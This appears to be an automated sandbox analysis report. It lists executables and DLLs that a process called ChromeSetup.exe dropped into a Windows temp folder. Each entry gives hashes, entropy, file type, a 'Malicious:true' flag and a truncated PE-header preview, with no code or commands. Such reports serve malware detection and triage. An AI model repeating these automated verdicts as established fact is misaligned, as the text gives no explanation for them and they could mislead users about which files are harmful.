                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L......e..........................................@.......................................@..................................5..<....`..p2...........~.. )...........+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...............n..............@..B........................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exe

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1376816
                                      Entropy (8bit):7.919887049125556
                                      Encrypted:false
                                      SSDEEP:24576:PJvKzcVkyEq9DRho1jFP8ltPP01Ws7+wFPEl9ix4fpUzoQDt+egElxdqFWVCGC:FKzcCyEq9DRho/ctH01Ws74rA4RUBDHo
                                      MD5:8884A9547AA410B697EFAD097F2B0013
                                      SHA1:F3E7B8A25DF24532F48DAE750388E1749169B620
                                      SHA-256:24E46969CEA3B387E899D5DA33820B988A9944100E47ABA3D1960C4080F28B9B
                                      SHA-512:E03EB2EB3F8414B2C9AA9431B63082FB195EA499DC7C1EA9E67E649C81B5C13D922FDA30C5B62CA15A9BCCBC6D7F6EFA4A92EF604216E80EF3EE14D10E38B1C4
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../..VNe.VNe.VNe.<f.\Ne.<`..Ne.<a.BNe..$a.GNe..$f.DNe..$`.{Ne."%l.PNe.<d.[Ne.VNd. Ne."%..WNe.VN..aNe."%g.WNe.RichVNe.........PE..L......e.........."......x...:......tS............@.................................bG....@.....................................x.... ..................0L..............T...............................@............................................text....v.......x.................. ..`.rdata..Fo.......p...|..............@..@.data...............................@....rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2040096
                                      Entropy (8bit):6.851106187237549
                                      Encrypted:false
                                      SSDEEP:24576:3HhPvGlhhk7g+Kq8RpRBr0saiXFkGB9zkdpglcKQGFRglutbceGlsIVkuV6WlZv4:R+677eRFoqFkak3gllbcvkaT1y3ezvN
                                      MD5:DCE0FD2B11B3E4C79A8F276A1633E9AE
                                      SHA1:568021B117ACE23458F1A86CD195D68DE7164FA9
                                      SHA-256:C917AD2BF8C286AE0B4D3E9203AB3DA641AF4C8D332E507319EE4DF914D6219C
                                      SHA-512:BA89867FD2BEA6166B6E27C2A03A9A4759AEE1AFFE75D592F381D9CB42FACBA1AF1535F009A26F2613338B50DE13B6576AB23C4E24D90827739F1678923FF771
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{k..{k..{k.....zk.....zk.....jk.....k......Zk......lk......:k.....ak.....Pk..{k...i......'j......zk....q.zk..{k..@k......zk..Rich{k..........PE..L...V..e...........!.....8...........f.......P...............................`.......#....@......................... ...X...x.......................... )...@..........T...........................X...@............P...............................text...g6.......8.................. ..`.rdata..6....P.......<..............@..@.data...........`..................@....rsrc..............................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.795449103754647
                                      Encrypted:false
                                      SSDEEP:384:3r1C4k4sI+h2cjIYi6yIDYcAM+o/8E9VF0NyFzgMd:BCZJBMYi6yKYcAMxkEfgM
                                      MD5:46F8834DD275C0C165D4E57E0F074310
                                      SHA1:7ACBFB7E88E9E29E2DC45083F94A95A409F03109
                                      SHA-256:91AC6C9686D339BAA0056B1260F4FD1394CE965B1957AA485E83AE73492F46B5
                                      SHA-512:B615FE41B226273693DA423969A834B72C5148F5438E7A782D39191AD3013E2ABFA10D651FA2DED878ABB118E31831DC7DEC51729B3235CEBB2B5D7F3BA2ADE1
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ ............................................@.............................I....0..(....@..Pp.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...Pp...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):42272
                                      Entropy (8bit):4.793537445820405
                                      Encrypted:false
                                      SSDEEP:384:MficanBDBGHHIYi6y//dHAM+o/8E9VF0NyRZ6:HcanTgoYi6yNHAMxkEN6
                                      MD5:D1C81B89825DE4391F3039D8F9305097
                                      SHA1:ECFCF4B50DFBB460E1D107F9D21DD60030BF18C3
                                      SHA-256:597FE53D87F8AA43B7E2DEB4A729FC77131E4A2B79DC2686E8B86CC96989428E
                                      SHA-512:A2BE34C226C0A596EFA78240984147196A4DE8C93187AF5835F0CEC90ED89E7DFFD7030CD27E7A1F1BD7F26D99322E785E195F5D41BF22E00C4AF08270699642
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........v......h........ ......................................U.....@.............................I....0..(....@...m...........|.. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....m...@...n..................@..@.reloc.. ............z..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.824313728277788
                                      Encrypted:false
                                      SSDEEP:384:0/dAtck8aGIZBOc8wIYi6yejAM+o/8E9VF0NykP:01Al7D8ZYi6yoAMxkE
                                      MD5:0D7125B1BDA74781D8F1536E43EB0940
                                      SHA1:39818CACCE52FF2EDFB2A065BEB376D43FDB0A93
                                      SHA-256:00DFE30F3E747B5788F7AE89B390E63760561A411B7E39257376CD13700A1E0B
                                      SHA-512:C34D7405ACCEB7186CF63E75083981B9230D2755E207FDFD1DBCE7D59A96F30EC04C28C12DBE0ED96FB595C63DEC8819C08D406840787D9B9797568FBF50DEC2
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ......................................D.....@.............................I....0..(....@..Py.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...Py...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.881792695700134
                                      Encrypted:false
                                      SSDEEP:384:UgrvUx7tVF7qTFoFrTFgRj+mBwmhIYi6yfSeTAM+o/8E9VF0Ny7Z:Zru0FoFXFWBwm2Yi6ytAMxkED
                                      MD5:64ED14E0070B720FCEFE89E2AB323604
                                      SHA1:495C858C55151E2400A1A72023AA62216033F928
                                      SHA-256:635F3A7FD3C1F62EB91117189AC84E1A1E5C3A8E104863D125C16E8BE570E3D1
                                      SHA-512:4FAB73DE11E595C7E4EDD9A66137F8E7B0B13DB1799DBE4C10DD766783079D38D560C6CC1BF9AF4BC1ABD71F1706643BD9A31C0F58E55DF3D0DD7D739E1480B7
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...x.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....x...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.598811412978355
                                      Encrypted:false
                                      SSDEEP:384:T54e2yrzVu/k4bHoQIYi6ye2JQAM+o/8E9VF0NyeHVxx:d4e2yrBuVo5Yi6yTJQAMxkE2Vxx
                                      MD5:BA783AC59839551280618C83C760D583
                                      SHA1:53D1D10955E322A6135B047EECD88A4815F9B6DA
                                      SHA-256:C2D15F8DA32907D8CEA1AAA0D51F16BC692A74141FDACE43A84C78647433A086
                                      SHA-512:A635D52C20164A02DC3FC4DDB961BF36177014E0CB27E50588013A0E9F3787194DE3C9DA160672B62B25EB94DDCEA366BCAA44B6BFA593DA77C97ABA48F8A50B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...x.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....x...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.649122419825438
                                      Encrypted:false
                                      SSDEEP:384:QcO4BWDqBkwEAuf26IYi6yhRdAM+o/8E9VF0NyBy:3OPj2HYi6yNAMxkE
                                      MD5:8041B1DB1F5A00DC1A617F02D9CD9744
                                      SHA1:963BB4E81134089D12B26AD1631BB0825E9B8FA3
                                      SHA-256:C823D54A7777E3CB0FF2BBEC829833F0AD5BFBE58290AF02E0F85A877DB50FB7
                                      SHA-512:BFA81A184E2985E2755C941137562C40AD4903A9B883F84471FF10636C363BE909DB0044BB4320C1FB615303EE375D64675A894ABE08414FF1C0A5DA0E22D450
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................$.....@.............................I....0..(....@..@u.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...@u...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.605474690624573
                                      Encrypted:false
                                      SSDEEP:384:ThmfN3wtpOcqJ4UIYi6y3vMAM+o/8E9VF0Nyym:tS3wxo4lYi6ykAMxkE
                                      MD5:13BB66CF80AEA019219F9181496B5B74
                                      SHA1:8BBD83FFF1BCDC01E93ED263B8564519A7C6FE7C
                                      SHA-256:C9E878E8C3A2EBE17DF25C3406A0C449D93E56620E3006E83CE777952F47A488
                                      SHA-512:E7C84E8C600767CB4DF43B9ED1C5220BECDE79C32F832158BD78368EC9B04422F272715BBCA5A261DA967FCB019DBF01D154467C77D2775E46E19AB3F6D64F9C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ............................................@.............................I....0..(....@..hu.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...hu...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):46368
                                      Entropy (8bit):4.593598830627038
                                      Encrypted:false
                                      SSDEEP:384:BRmUy8gjhO4MesINK/QxSIYi6y90tQAM+o/8E9VF0NyDfcrX:HA1MeZsQx/Yi6y1AMxkE9crX
                                      MD5:C1DD450C8F536604579902FB23013233
                                      SHA1:AE60094A4A1A2A33624A65B0CE3132A77DE6C6E6
                                      SHA-256:A8422F753E831EA71C41867CFDC767FCBC05874FC039A0101BD05C571F8D822B
                                      SHA-512:35AB265A6363856E40156185BFFB93D6481EA321F63A033160847CB88CC0764A18F14F9A72265E2F1F9CAEFF4702EFDD147A46B23614FCE090E08B78CD3EBC4F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...|.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....|...@...~..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.897059533677385
                                      Encrypted:false
                                      SSDEEP:384:vr7EDleILkSIuHCSqlIxRFiAhkg8zBdfsBsTbMaIYi6yWhKOxJAM+o/8E9VF0NyE:TYZlLOWR5m/0nYi6yQKIAMxkES
                                      MD5:59BA1742A224CB96C89CA335FF208409
                                      SHA1:2B595FEED6EFE926CC87C16534C3B8BAFC511CDB
                                      SHA-256:2836EC2D0830B66F281D65CB24F9EA2311E6464F13D4D0E41547BE5CE994582E
                                      SHA-512:A4E7BD47AF97387EF0828DAA4D1B6F820FAEF02C28E77DDA0DA08E0A4766F2BEAC42D4AC5DFEC82E7C3FD1A39E9D6A1359D45750EBCE4C0E6722567B1DF6E919
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ............................................@.............................I....0..(....@...{.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....{...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.602499788630145
                                      Encrypted:false
                                      SSDEEP:384:B011yagyXbuTTIYi6yi57zAM+o/8E9VF0NyOZ8:UyagyXqTcYi6yIAMxkEz
                                      MD5:68420A06AD032BD6A79B2472C3350476
                                      SHA1:4E301F757C209DC928AB05370A51ABCA66BD38D8
                                      SHA-256:BBD19A75809F516726289377F97D67AE5F9122FDAD0AD9F34974CBBBC91B9968
                                      SHA-512:9829CB34552D85B99441273174E801F401B1D7DF3C7140E8BBDB74B77008E3E258BBAFAB2AFB3F01F7909198C1376A3AE9360C941C7DF60AD49309FB916B5F8F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ ......................................7'....@.............................L....0..(....@...q.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....q...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.597501302210217
                                      Encrypted:false
                                      SSDEEP:384:hN3zagyMeRTcIYi6yNfAM+o/8E9VF0Nyv2K:7zagyMeTNYi6yhAMxkERX
                                      MD5:0D30A76BBCBC637382FAD5A927297A2F
                                      SHA1:39DBD1BCB5372E06AA4FFA3A6FE0010BF8652517
                                      SHA-256:DC22CBD055CFAE79301C7906CA1E2A1E926AAF943FB11D8060B91202BD5759AA
                                      SHA-512:1D73F9A223FF1D292A4886C1377A2DCA0459B6F757F814D73E66746F25B4E97FBAF90188D96CC1829BC9A288B5A118FF472FABB1C401994B1524D70E92953F8D
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ ............................................@.............................I....0..(....@..xq.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...xq...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44832
                                      Entropy (8bit):4.589128614101453
                                      Encrypted:false
                                      SSDEEP:384:+Bphfy4xLIYi6yzK1IuAM+o/8E9VF0NyUYz:2phfy4x0Yi6ymIuAMxkE3
                                      MD5:4A28036303C7F36827A757D0950669B1
                                      SHA1:AF5FA8D2DBBD8F8BDAC508F187731CF33FF8B960
                                      SHA-256:0047475C9353A570604D437D8985CEBC7230B26F010EF30F4176F93F0C2361B4
                                      SHA-512:B5EAF77B729142ABC233974C3900C39CD75FD2252E8ED49059BFE607D2B1C74B28F347B86793AA8E5A12C87701BFCE8E9C87D34E262DF7BE559ECBD0F56E9C0F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................l........ ............................................@.............................M....0..(....@...v.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....v...@...x..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):46368
                                      Entropy (8bit):4.577924746396312
                                      Encrypted:false
                                      SSDEEP:384:t4sLNRaLElvnIYi6yF8AM+o/8E9VF0NyLl:WsLN2ElvIYi6yiAMxkE
                                      MD5:F49411F7F8FEB475EE096DB6A5938290
                                      SHA1:6926DDAF08B3F701FB357F032E76BB33E63F50F0
                                      SHA-256:E7A76D367BFFEA50A8F0B2F8DAEE91B3E5250431127A9DFDAA25980C39B22573
                                      SHA-512:0F95D6CF92882A30DEDF4B51BDA94CFF87DA327843569AA4F3C763FA2C658378795ADAEDBC3D93958128376E51D2D0792958DEF24A2E19C57D6717153D3512FF
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................o....@.............................I....0..(....@..x|.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...x|...@...~..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43808
                                      Entropy (8bit):4.587109826178785
                                      Encrypted:false
                                      SSDEEP:384:JeQrbDFbDuVEbJRzSQn/IYi6yx1AM+o/8E9VF0NyzCz:0s9umDnnAYi6yXAMxkE8z
                                      MD5:6D9E77D00E750D6C56784BD03DFE7137
                                      SHA1:E0C8E15ADFB6B3EFDC2EB1F7F3FBF5301D185EE6
                                      SHA-256:FEECECD2144DA0F8D7006695F2E915FEF34B1CF1C00C867E2A08CF8D9E5B5BC5
                                      SHA-512:8082E6BBF590212CDFD5B844557B66702E60220CD02D5850FB821A4A6527D4D5E82F1FA7595FAB01F76090E8992EBAB92DE614205DB4413FFB6BC48C9C10F185
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........|......h........ ............................................@.............................I....0..(....@..Hr.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc...Hr...@...t..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):43296
                                      Entropy (8bit):4.796897555990958
                                      Encrypted:false
                                      SSDEEP:384:WhOsQZbXQ54mWIYi6yoyPKAM+o/8E9VF0NyN3Wl:e34AYi6yJKAMxkEvWl
                                      MD5:66E75AAC042E5776513C1A20F360DF78
                                      SHA1:2916825A831048EAE55402371591221BE27EBA3B
                                      SHA-256:2528329F2177422671714B67C9D292E681791C26E6FCA8D3E99D92434F23D686
                                      SHA-512:6985D5004B6E919B7977C608BE044004D2C1AAFE1F855DD4B47DEDB2F3A22CB04608DF2C6079480B7CB3D08F8605C8AAD1B3279C78482AFD44280DB143508839
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........z......h........ ............................................@.............................I....0..(....@...q.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....q...@...r..................@..@.reloc.. ............~..............@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):44320
                                      Entropy (8bit):4.598852816619392
                                      Encrypted:false
                                      SSDEEP:384:i/gzfEUPhXY7RTYXU9hKh9GAH8IYi6ywgYfAM+o/8E9VF0NyhCQt:o2fEomQjHtYi6yEAMxkEJ
                                      MD5:0FF6B7BE8CCEAE26BD9ADE3914B987C3
                                      SHA1:6BB771E7C844CA501CBD1A05C0C19BB2078A784B
                                      SHA-256:52E75123D0C6CA6904A613AEBEF15DC9E662A7296089923EA690B4E627E5CBE9
                                      SHA-512:98E13A07D13691EB113AE63EFF36C7C9041582DDFFFB26F3918C0E87F484315930A0E924868C83DAB46349BC09DDDCB5BF0AE7A01155D9B1E2D90ABA5AC4834B
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!.........~......h........ ......................................S.....@.............................I....0..(....@...t.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....t...@...v..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45344
                                      Entropy (8bit):4.586244572418377
                                      Encrypted:false
                                      SSDEEP:384:3rRcUrPer+B3Rlaw7yNmIYi6yK8gAM+o/8E9VF0Nyc:7RcU7c+B3RlawWN7Yi6yCAMxkE
                                      MD5:B039877936C8BC88EFD93656E8E2FC3A
                                      SHA1:B27E928267E2B7085E45CF6F450BA8BCC0AF66E2
                                      SHA-256:7FFA28C0273C63AAD16D3AC3419144F5BB8CE3484BE73C45130927AA3ADA6E43
                                      SHA-512:26992D60966D56B64B0CA2047F9149BBAC8E6522D14AC2A9B2A4E57D5991F26A050E02FCB475243F0787221FC2307D5523F2C33B6ABC3F6C7AA5DAA1938F67F3
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ .......................................}....@.............................J....0..(....@...x.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....x...@...z..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.598368347361002
                                      Encrypted:false
                                      SSDEEP:384:CcN98EoMcpW4xwgIYi6yTUIIAM+o/8E9VF0NyPbCt:bNaMcNwpYi6ylIAMxkElC
                                      MD5:048033BD00459D6A545744BA1D46AB45
                                      SHA1:1F9CB02B84DA6B603B8BE9A717F4AE3F32CB3F4A
                                      SHA-256:52099330CDFDB45B04DB7BC0B2003762906AFDCA4CE16E7A33F0B4F7AEBEFE7B
                                      SHA-512:66A676C37E03DD326777534ABA889410A6ECF43E17A5F5736415A5BE179D4F8AEFD626A1F28B4869D3DD17A296B04EAA88D20C90796F9A9CFC3899007A08748C
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..|?..|?..|?.m.;..|?...>..|?..|>..|?...6..|?...?..|?......|?...=..|?.Rich.|?.........PE..L......e...........!................h........ ...........................................@.............................I....0..(....@...z.............. )...... .......T...........................h...@............0...............................text............................... ..`.data...$.... ......................@....idata..f....0......................@..@.rsrc....z...@...|..................@..@.reloc.. ...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll

                                      Download File
                                      Process:C:\Program Files (x86)\ChromeSetup.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):45856
                                      Entropy (8bit):4.8796776754691225
                                      Encrypted:false
                                      SSDEEP:384:O2/3UrpgV4DkYCQsfwDkIf4IYi6yDIYRRAM+o/8E9VF0Ny2v9A:1fUrpboufhYi6y8YRRAMxkE1
                                      MD5:9ACB142C6097BEF9A56847EAFF078A5C
                                      SHA1:D69D206D06DCF09B46B0E8BB47C177CB2A5BD8E6
                                      SHA-256:125B6EE3B4FEE064EABC9BAF671A366E4E88F68C97E582972CF741D914284628
                                      SHA-512:49F06023C4C70B75AABB81B586114704BC905480F4C0978E8D4315C232EA0B5D7D9545B7D02A9B24B71F72B066E926839908E2ACE1CCF245716E6EF2FCF1193C
                                      Malicious:true
